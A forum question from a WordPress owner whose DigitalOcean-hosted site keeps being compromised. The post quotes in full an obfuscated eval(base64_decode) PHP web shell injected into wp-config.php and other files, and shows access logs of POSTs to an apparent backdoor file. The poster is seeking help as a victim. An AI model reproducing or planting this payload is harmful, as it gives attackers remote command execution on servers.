DigitalOcean Wordpress instance getting attacked

Question

Hey,

I’ve got a wordpress instance setup from the one-click digital ocean installer. It runs fine most of the time but I keep getting attacked, causing the site to go down.

I have already setup JetPack as described in this article to prevent rpc attacks, but I still seem to be getting screwed.

This keeps getting injected into my php files (wp-config.php, index.php, wp-settings.php, etc)

eval(base64_decode("JGFyclswXT0iQ2lSaGRYUm9JRDBnSW1ZeU1HUTJOVFEyTTJZeFpqVmlaalJrTldRNE56VXlPR0UxWlRJd01EUm1JanNLSkhWeWJDQTlJQ0pvZEhSd09pOHZJaTRrWDFORlVsWkZVbHNuU0ZSVVVGOUlUMU5VSjEwdUpGOVRSVkpXUlZKYkoxSkZVVlZGVTFSZlZWSkpKMTA3Q2dwbWRXNWpkR2x2YmlCa2FYTndiR0Y1WDJGMWRBPT0iOyRhcnJbMV09ImFGOW1iM0p0S0NrZ2V3b2dJQ0FnWjJ4dlltRnNJQ1IxY213N0NpQWdJQ0EvUGdvZ0lDQWdQR1p2Y20wZ1lXTjBhVzl1UFNJOFAzQm9jQ0JsWTJodklDUjFjbXdnUHo0aUlHMWxkR2h2WkQwaWNHOXpkQ0krQ2lBZ0lDQWdJQ0FnUEdsdWNIVjBJSFI1Y0dVOUluQmhjM04zYjNKa0lpQnBaRDBpY0hka0lpQnVZUT09IjskYXJyWzJdPSJiV1U5SW5CM1pDSStDaUFnSUNBZ0lDQWdQR2x1Y0hWMElIUjVjR1U5SW1ocFpHUmxiaUlnYVdROUltUnZYMkYxZEdnaUlHNWhiV1U5SW1SdlgyRjFkR2dpUGdvZ0lDQWdJQ0FnSUR4cGJuQjFkQ0IwZVhCbFBTSnpkV0p0YVhRaVBnb2dJQ0FnUEM5bWIzSnRQZ284UDNCb2NBcDlDZ3BtZFc1amRHbHZiaUJoZFE9PSI7JGFyclszXT0iZEdnb0tTQjdDaUFnSUNCbmJHOWlZV3dnSkdGMWRHZzdDaUFnSUNCcFppQW9LQ0ZwYzNObGRDZ2tYME5QVDB0SlJWc25ZWFYwYUNkZEtTa2dKaVlnS0NGcGMzTmxkQ2drWDFCUFUxUmJKMlJ2WDJGMWRHZ25YU2twS1NCN0NpQWdJQ0FnSUNBZ1pHbHpjR3hoZVY5aGRYUm9YMlp2Y20wb0tUc0tJQ0FnSUNBZ0lBPT0iOyRhcnJbNF09IklHUnBaU2dwT3dvZ0lDQWdmUW9nSUNBZ2FXWWdLR2x6YzJWMEtDUmZVRTlUVkZzblpHOWZZWFYwYUNkZEtTa2dld29nSUNBZ0lDQWdJR2xtSUNocGMzTmxkQ2drWDFCUFUxUmJKM0IzWkNkZEtTa2dld29nSUNBZ0lDQWdJQ0FnSUNCcFppQW9iV1ExS0NSZlVFOVRWRnNuY0hka0oxMHBQVDA5SkdGMWRHZ3BJQT09IjskYXJyWzVdPSJld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjMlYwWTI5dmEybGxLQ0poZFhSb0lpeHRaRFVvSkY5UVQxTlVXeWR3ZDJRblhTa3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjbVYwZFhKdUlIUnlkV1U3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMGdaV3h6WlNCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCa2FYTndiR0Y1WHc9PSI7JGFycls2XT0iWVhWMGFGOW1iM0p0S0NrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCa2FXVW9LVHNLSUNBZ0lDQWdJQ0FnSUNBZ2ZRb0tJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdaR2x6Y0d4aGVWOWhkWFJvWDJadmNtMG9LVHNLSUNBZ0lDQWdJQ0JrYVdVb0tUc0tJQ0FnSUgwS0NpQWdJQ0JwWmlBb2FYTnpaWFFvSkY5RFR3PT0iOyRhcnJbN109IlQwdEpSVnNuWVhWMGFDZGRLU2tLSUNBZ0lDQWdJQ0JwWmlBb0pGOURUMDlMU1VWYkoyRjFkR2duWFQwOVBTUmhkWFJvS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJSEpsZEhWeWJpQjBjblZsT3dvZ0lDQWdJQ0FnSUgwZ1pXeHpaU0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lHUnBjM0JzWVhsZllYVjBhRjltYjNKdEtDazdDZz09IjskYXJyWzhdPSJJQ0FnSUNBZ0lDQWdJQ0FnWkdsbEtDazdDaUFnSUNBZ0lDQWdmUXA5Q2dwbWRXNWpkR2x2YmlCa2FYTndiR0Y1WDJsdWRHVnlabUZqWlNncElIc0tJQ0FnSUdkc2IySmhiQ0FrZFhKc093b2dJQ0FnUHo0S0lDQWdJRHhvZEcxc1Bnb2dJQ0FnUEhScGRHeGxQancvY0dod0lHVmphRzhnSkY5VFJWSldSVkpiSnc9PSI7JGFycls5XT0iU0ZSVVVGOUlUMU5VSjEwN0lEOCtQQzkwYVhSc1pUNEtJQ0FnSUR4emRIbHNaVDRLSUNBZ0lDQWdJQ0FqZDJsdVpHOTNjaUI3Q2lBZ0lDQWdJQ0FnSUNBZ0lHWnZiblF0YzJsNlpUb2dNVE53ZURzS0lDQWdJQ0FnSUNBZ0lDQWdZMjlzYjNJNkl6QXdabVl3TURzS0lDQWdJQ0FnSUNBZ0lDQWdZbTl5WkdWeU9nPT0iOyRhcnJbMTBdPSJNbkI0SUhOdmJHbGtJQ013TUdFd01EQTdDaUFnSUNBZ0lDQWdJQ0FnSUhkcFpIUm9Pamd3TUhCNE95Qm9aV2xuYUhRNk5UQndlRHNLSUNBZ0lDQWdJQ0FnSUNBZ1ltRmphMmR5YjNWdVpEb2dJekF3TURBd01Ec0tJQ0FnSUNBZ0lDQWdJQ0FnY0dGa1pHbHVaeTFzWldaME9qRXdjSGc3Q2lBZ0lDQWdJQ0FnZlE9PSI7JGFyclsxMV09IkNpQWdJQ0FnSUNBZ0kyTnRaQ0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lHSmhZMnRuY205MWJtUTZJQ015UmpKR01rWTdDaUFnSUNBZ0lDQWdJQ0FnSUdOdmJHOXlPaU13TUdabU1EQTdDaUFnSUNBZ0lDQWdmUW9nSUNBZ1BDOXpkSGxzWlQ0S0lDQWdJRHh6WTNKcGNIUStDZ29nSUNBZ0lDQWdJR1oxYm1OMGFXOXVJQT09IjskYXJyWzEyXT0iYkc5bmIzVjBLQ2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmtiMk4xYldWdWRDNWpiMjlyYVdVOUltRjFkR2c5TVRzaU93b2dJQ0FnSUNBZ0lDQWdJQ0IzYVc1a2IzY3ViRzlqWVhScGIyNDlKencvY0dod0lHVmphRzhnSkhWeWJEc2dQejRuT3dvZ0lDQWdJQ0FnSUgwS0NpQWdJQ0FnSUNBZ1puVnVZM1JwYjI0Z1lRPT0iOyRhcnJbMTNdPSJhbUY0UTJGc2JHSmhZMnNvZEhoMEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUhaaGNpQjNhVzVrYjNkeUlEMGdaRzlqZFcxbGJuUXVaMlYwUld4bGJXVnVkRUo1U1dRb0ozZHBibVJ2ZDNJbktUc0tJQ0FnSUNBZ0lDQWdJQ0FnZDJsdVpHOTNjaTUyWVd4MVpUMTNhVzVrYjNkeUxuWmhiSFZsSzNSNGRDc25YRzRuT3c9PSI7JGFyclsxNF09IkNpQWdJQ0FnSUNBZ0lDQWdJSGRwYm1SdmQzSXVjMk55YjJ4c1ZHOXdJRDBnZDJsdVpHOTNjaTV6WTNKdmJHeElaV2xuYUhRN0NpQWdJQ0FnSUNBZ0lDQWdJSFpoY2lCamJXUWdQU0JrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwUW5sSlpDZ25ZMjFrSnlrN0NpQWdJQ0FnSUNBZ0lDQWdJR050WkM1MllXeDFaUT09IjskYXJyWzE1XT0iUFNjbk93b2dJQ0FnSUNBZ0lIMEtDaUFnSUNBZ0lDQWdablZ1WTNScGIyNGdZMkZzYkVGcVlYZ29kWEpzTEhCdmMzUmtZWFJoS1hzS0lDQWdJQ0FnSUNBZ0lDQWdMeTkyWVhJZ1ltOWtlU0E5SUdWdVkyOWtaVlZTU1VOdmJYQnZibVZ1ZENod2IzTjBaR0YwWVNrN0NpQWdJQ0FnSUNBZ0lDQWdJQzh2WVd4bGNnPT0iOyRhcnJbMTZdPSJkQ2h3YjNOMFpHRjBZU2s3SUhKbGRIVnlianNLSUNBZ0lDQWdJQ0FnSUNBZ2RtRnlJSGh0YkdoMGRIQTdDZ29nSUNBZ0lDQWdJQ0FnSUNCNGJXeG9kSFJ3SUQwZ2JtVjNJRmhOVEVoMGRIQlNaWEYxWlhOMEtDazdDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YjI1eVpXRmtlWE4wWVhSbFkyaGhibWRsSUE9PSI7JGFyclsxN109IlBTQm1kVzVqZEdsdmJpZ3Bld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0hodGJHaDBkSEF1Y21WaFpIbFRkR0YwWlNBOVBTQTBJQ1ltSUhodGJHaDBkSEF1YzNSaGRIVnpJRDA5SURJd01DbDdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWVdwaGVFTmhiR3hpWVdOcktIaHRiR2gwZEhBdWNtVnpjQT09IjskYXJyWzE4XT0iYjI1elpWUmxlSFFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnZlFvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YjNCbGJpZ2lVRTlUVkNJc0lIVnliQ3dnZEhKMVpTazdDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YzJWMFVtVnhkV1Z6ZEVobFlXUmxjaWduUTI5dWRBPT0iOyRhcnJbMTldPSJaVzUwTFZSNWNHVW5MQ0FuWVhCd2JHbGpZWFJwYjI0dmVDMTNkM2N0Wm05eWJTMTFjbXhsYm1OdlpHVmtKeWs3Q2lBZ0lDQWdJQ0FnSUNBZ0lIaHRiR2gwZEhBdWMyVnVaQ2h3YjNOMFpHRjBZU2s3Q2lBZ0lDQWdJQ0FnZlFvS0lDQWdJQ0FnSUNCbWRXNWpkR2x2YmlCb1lXNWtiR1ZGYm5SbGNpaHZMR1VwSUE9PSI7JGFyclsyMF09ImV3b2dJQ0FnSUNBZ0lDQWdJQ0JwWmlBb1pTNXJaWGxEYjJSbElEMDlJREV6S1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCMllYSWdZMjFrSUQwZ1pHOWpkVzFsYm5RdVoyVjBSV3hsYldWdWRFSjVTV1FvSjJOdFpDY3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdkbUZ5SUhkcGJtUnZkM0lnUFNCa2IyTjFiUT09IjskYXJyWzIxXT0iWlc1MExtZGxkRVZzWlcxbGJuUkNlVWxrS0NkM2FXNWtiM2R5SnlrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCM2FXNWtiM2R5TG5aaGJIVmxQWGRwYm1SdmQzSXVkbUZzZFdVckoxeHVKQ0FuSzJOdFpDNTJZV3gxWlNzblhHNG5Pd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZMkZzYkVGcVlYZ29KencvY0dod0lBPT0iOyRhcnJbMjJdPSJaV05vYnlBa2RYSnNPeUEvUGljc0oyRmpkR2x2YmoxamJXUW1ZMjFrUFNjclpXNWpiMlJsVlZKSlEyOXRjRzl1Wlc1MEtHTnRaQzUyWVd4MVpTa3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjbVYwZFhKdUlHWmhiSE5sT3dvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdmUW9LQ2lBZ0lDQThMM05qY2c9PSI7JGFyclsyM109ImFYQjBQZ29nSUNBZ1BHSnZaSGtnYzNSNWJHVTlJbUpoWTJ0bmNtOTFibVE2SUNNd01EQTdJajRLSUNBZ0lEeDBZV0pzWlNCM2FXUjBhRDBpTVRBd0pTSWdZbTl5WkdWeVBTSXdJaUJ6ZEhsc1pUMGlZbUZqYTJkeWIzVnVaRG9nSXpBd01Ec2dZMjlzYjNJNklDTXdaakE3SWo0S0lDQWdJQ0FnSUNBOGRISWdkdz09IjskYXJyWzI0XT0iYVdSMGFEMGlNVEF3SlNJK0NpQWdJQ0FnSUNBZ0lDQWdJRHgwWkNCM2FXUjBhRDBpTVRBd0pTSStDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQThZMlZ1ZEdWeVBnb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRHhwYm5CMWRDQjBlWEJsUFNKMFpYaDBJaUJwWkQwaVkyMWtJaUJ1WVcxbFBTSmpiV1FpSUhOMGVRPT0iOyRhcnJbMjVdPSJiR1U5SW5kcFpIUm9PaUE0TURCd2VEc2lJRzl1YTJWNVpHOTNiajBpYW1GMllYTmpjbWx3ZERwb1lXNWtiR1ZGYm5SbGNpaDBhR2x6TEdWMlpXNTBLVHNpUGdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnUEM5alpXNTBaWEkrQ2lBZ0lDQWdJQ0FnSUNBZ0lEd3ZkR1ErQ2lBZ0lDQWdJQ0FnUEM5MGNqNEtJQ0FnSUE9PSI7JGFyclsyNl09IklDQWdJRHgwY2lCM2FXUjBhRDBpTVRBd0pTSStDaUFnSUNBZ0lDQWdJQ0FnSUR4MFpDQjNhV1IwYUQwaU1UQXdKU0krQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0E4WTJWdWRHVnlQZ29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUR4MFpYaDBZWEpsWVNCcFpEMGlkMmx1Wkc5M2NpSWdibUZ0WlQwaWQybHVaQT09IjskYXJyWzI3XT0iYjNkeUlpQnpkSGxzWlQwaWQybGtkR2c2SURnd01IQjRPeUJvWldsbmFIUTZJRGd3TUhCNE95SStQQzkwWlhoMFlYSmxZVDRLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRHd2WTJWdWRHVnlQZ29nSUNBZ0lDQWdJQ0FnSUNBOEwzUmtQZ29nSUNBZ0lDQWdJRHd2ZEhJK0NpQWdJQ0FnSUNBZ1BIUnlQangwWkQ0OFl3PT0iOyRhcnJbMjhdPSJaVzUwWlhJK1BHRWdhSEpsWmowaUl5SWdiMjVqYkdsamF6MGlhbUYyWVhOamNtbHdkRG9nYkc5bmIzVjBLQ2s3SWo1bGVHbDBQQzloUGp3dlkyVnVkR1Z5UGp3dmRHUStQQzkwY2o0S0lDQWdJRHd2ZEdGaWJHVStDaUFnSUNBOEwySnZaSGsrQ2lBZ0lDQThMMmgwYld3K0Nqdy9jR2h3Q24wS0NtWjFibU4wYVE9PSI7JGFyclsyOV09ImIyNGdhR0Z1Wkd4bFgyTnRaQ2dwSUhzS0lDQWdJSE41YzNSbGJTZ2tYMUJQVTFSYkoyTnRaQ2RkTGlJZ01qNG1NU0lwT3dwOUNncG1kVzVqZEdsdmJpQm9ZVzVrYkdWZlltOTBYMk50WkNncElIc0tJQ0FnSUdsbUlDaHBjM05sZENna1gxQlBVMVJiSjJOdFpDZGRLU2tLSUNBZ0lDQWdJQ0J6ZDJsMFkyZ29KQT09IjskYXJyWzMwXT0iWDFCUFUxUmJKMk50WkNkZEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUdOaGMyVWdKMk52WkdVbk9nb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1JmWTI5a1pTZ3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ0lDQWdJR05oYzJVZ0ozTm9aV3hzSnpvS0lBPT0iOyRhcnJbMzFdPSJJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1JmYzJobGJHd29LVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR0p5WldGck93b2dJQ0FnSUNBZ0lDQWdJQ0JrWldaaGRXeDBPZ29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ2ZRcDlDZ3BtZFc1amRHbHZiaUJvWVE9PSI7JGFyclszMl09ImJtUnNaVjlpYjNSZlkyMWtYM05vWld4c0tDa2dld29nSUNBZ2IySmZjM1JoY25Rb0tUc0tJQ0FnSUhONWMzUmxiU2hpWVhObE5qUmZaR1ZqYjJSbEtDUmZVRTlUVkZzbllYSm5KMTBwS1RzS0lDQWdJQ1J5UFc5aVgyZGxkRjlqYkdWaGJpZ3BPd29nSUNBZ2NISnBiblFnSkhJN0NuMEtDbVoxYm1OMGFXOXVJQT09IjskYXJyWzMzXT0iYUdGdVpHeGxYMkp2ZEY5amJXUmZZMjlrWlNncElIc0tJQ0FnSUc5aVgzTjBZWEowS0NrN0NpQWdJQ0JsZG1Gc0tHSmhjMlUyTkY5a1pXTnZaR1VvSkY5UVQxTlVXeWRoY21jblhTa3BPd29nSUNBZ0pISTliMkpmWjJWMFgyTnNaV0Z1S0NrN0NpQWdJQ0J3Y21sdWRDQWtjanNLZlFvS1puVnVZM1JwYjI0Z2JBPT0iOyRhcnJbMzRdPSJiMmR2ZFhRb0tTQjdDaUFnSUNCbmJHOWlZV3dnSkhWeWJEc0tJQ0FnSUhObGRHTnZiMnRwWlNnaVlYVjBhQ0lzSWpFaUtUc0tJQ0FnSUhCeWFXNTBJQ0k4YzJOeWFYQjBQbmRwYm1SdmR5NXNiMk5oZEdsdmJqMG5JaTRrZFhKc0xpSW5Pend2YzJOeWFYQjBQaUk3Q2lBZ0lDQmthV1VvS1RzS2ZRb0tDZ3BoZFE9PSI7JGFyclszNV09ImRHZ29LVHNLYVdZZ0tDRnBjM05sZENna1gxQlBVMVJiSjJGamRHbHZiaWRkS1NrS0lDQWdJR1JwYzNCc1lYbGZhVzUwWlhKbVlXTmxLQ2s3Q2dwcFppQW9hWE56WlhRb0pGOVFUMU5VV3lkaFkzUnBiMjRuWFNrcENpQWdJQ0J6ZDJsMFkyZ2dLQ1JmVUU5VFZGc25ZV04wYVc5dUoxMHBJSHNLSUNBZ0lDQWdJQT09IjskYXJyWzM2XT0iSUdOaGMyVWdKMk50WkNjNkNpQWdJQ0FnSUNBZ0lDQWdJR2hoYm1Sc1pWOWpiV1FvS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ1kyRnpaU0FuWW05MFkyMWtKem9LSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1FvS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NnPT0iOyRhcnJbMzddPSJJQ0FnSUNBZ0lDQmpZWE5sSUNkc2IyZHZkWFFuT2dvZ0lDQWdJQ0FnSUNBZ0lDQnNiMmR2ZFhRb0tUc0tJQ0FnSUNBZ0lDQWdJQ0FnWW5KbFlXczdDaUFnSUNBZ0lDQWdaR1ZtWVhWc2REb0tJQ0FnSUNBZ0lDQWdJQ0FnY21WMGRYSnVPd29nSUNBZ2ZRPT0iOyRzdHI9IiI7Zm9yICgkaT0wOyAkaTxjb3VudCgkYXJyKTsgJGkrKykgeyRzdHIuPWJhc2U2NF9kZWNvZGUoJGFyclskaV0pO31ldmFsKCRzdHIpOw=="));

I believe RPC is working as when I check attacks they are all just JetPack. Ther results from (grep xmlrpc /var/log/apache2/access.log) is:

108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"

There are some fishy lookin POSTs in my apache logs, but not sure if related:

162.158.59.140 - - [13/Feb/2017:14:03:36 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:04:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:05:34 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:05:37 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:06:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:06:21 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:06:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.59.128 - - [13/Feb/2017:14:06:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
162.158.58.211 - - [13/Feb/2017:14:06:56 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:07:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:07:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:08:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:08:20 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:22 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:27 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:29 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:38 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:56 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:09:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:09:55 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:11:23 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:12:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:12:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:13:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.134 - - [13/Feb/2017:14:13:33 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
108.162.222.164 - - [13/Feb/2017:14:13:42 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:14:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:14:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:15:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.68 - - [13/Feb/2017:14:15:49 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.69.31 - - [13/Feb/2017:14:16:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:16:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.245.38 - - [13/Feb/2017:14:17:03 -0500] "GET /nate?_escaped_fragment_= HTTP/1.1" 500 206 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
162.158.69.31 - - [13/Feb/2017:14:17:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:17:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:17:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.69.31 - - [13/Feb/2017:14:18:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
